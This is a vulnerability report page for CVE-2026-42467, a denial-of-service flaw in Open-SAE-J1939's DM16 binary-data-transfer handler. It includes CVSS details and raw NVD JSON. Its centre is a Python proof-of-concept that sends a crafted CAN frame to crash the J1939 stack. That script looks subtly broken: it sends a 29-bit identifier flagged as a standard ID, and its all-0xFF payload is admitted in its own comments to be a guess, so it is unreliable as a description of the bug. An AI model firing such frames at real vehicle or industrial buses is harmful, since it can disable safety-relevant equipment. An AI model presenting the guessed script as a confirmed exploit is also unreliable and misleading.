Security Vulnerability Report
CVE-2026-42467 CVSS 7.5 HIGH

Published: 2026-05-01 17:16:25
Last Modified: 2026-05-05 20:24:05

Description

An issue was discovered in Open-SAE-J1939 thru commit b6caf884df46435e539b1ecbf92b6c29b345bdfe (2025-11-30) in SAE_J1939_Read_Binary_Data_Transfer_DM16 causing a denial of service via crafted CAN frame on the J1939 bus.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Open-SAE-J1939 <= commit b6caf884df46435e539b1ecbf92b6c29b345bdfe

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import can

# PoC for CVE-2026-42467: Open-SAE-J1939 DoS
# This script sends a crafted CAN frame targeting the DM16 handler.
# Replace 'vcan0' with the actual CAN interface.


def send_exploit_frame():
    # Initialize the bus interface
    bus = can.interface.Bus(channel='vcan0', bustype='socketcan')

    # Crafted CAN ID for DM16 (Binary Data Transfer)
    # PGN for DM16 is typically 0x00D900 (Data Transfer - Binary)
    # Priority: 6, PGN: 0x00D900, Source Address: 0x01
    can_id = 0x18D90101

    # Malicious payload designed to trigger the parsing bug
    # The specific byte sequence may vary based on the exact vulnerability trigger
    data = [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF]

    msg = can.Message(arbitration_id=can_id, data=data, is_extended_id=False)

    print("Sending malicious CAN frame...")
    try:
        bus.send(msg)
        print("Frame sent successfully.")
    except can.CanError:
        print("Error sending frame.")

    bus.shutdown()


if __name__ == "__main__":
    send_exploit_frame()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42467", "sourceIdentifier": "[email protected]", "published": "2026-05-01T17:16:25.027", "lastModified": "2026-05-05T20:24:04.853", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Open-SAE-J1939 thru commit b6caf884df46435e539b1ecbf92b6c29b345bdfe (2025-11-30) in SAE_J1939_Read_Binary_Data_Transfer_DM16 causing a denial of service via crafted CAN frame on the J1939 bus."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381", "source": "[email protected]"}]}}